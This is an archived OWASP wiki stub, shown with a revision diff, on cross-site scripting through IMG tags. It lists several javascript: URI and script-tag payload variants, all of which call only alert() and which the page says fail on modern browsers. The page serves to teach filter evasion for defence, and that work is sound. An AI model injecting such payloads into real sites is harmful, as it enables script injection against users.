This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org

Difference between revisions of "Script in IMG tags"

From OWASP
Jump to: navigation, search
Line 1: Line 1:
 
==Description==
 
==Description==
It is possible for an attacker to execute Javascript code via the IMG tags.  This is also refered to as XSS (Cross Site Scripting).
+
It is possible for an attacker to execute Javascript code via the IMG tags.  This is also refered to as XSS (Cross Site Scripting). However, this type of attack is no longer possible on modern browsers.
  
 
==Examples ==
 
==Examples ==
The following are methods an attacker can use in order to execute Javascript.<br><br>
+
The following are methods an attacker can use in order to execute Javascript but will not be effective against modern browsers.<br><br>
  
 
<IMG SRC="javascript:alert('Vulnerable');"><br>
 
<IMG SRC="javascript:alert('Vulnerable');"><br>

Revision as of 16:05, 2 April 2012

Description

It is possible for an attacker to execute Javascript code via the IMG tags. This is also refered to as XSS (Cross Site Scripting). However, this type of attack is no longer possible on modern browsers.

Examples

The following are methods an attacker can use in order to execute Javascript but will not be effective against modern browsers.

<IMG SRC="javascript:alert('Vulnerable');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says,
'XSS'")`>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG
SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG
SRC=javascript:alert('XSS')>

Related Threats

Related Attacks

XSS Attacks

Related Vulnerabilities

Related Countermeasures

Categories

This article is a stub. You can help OWASP by expanding it or discussing it on its Talk page.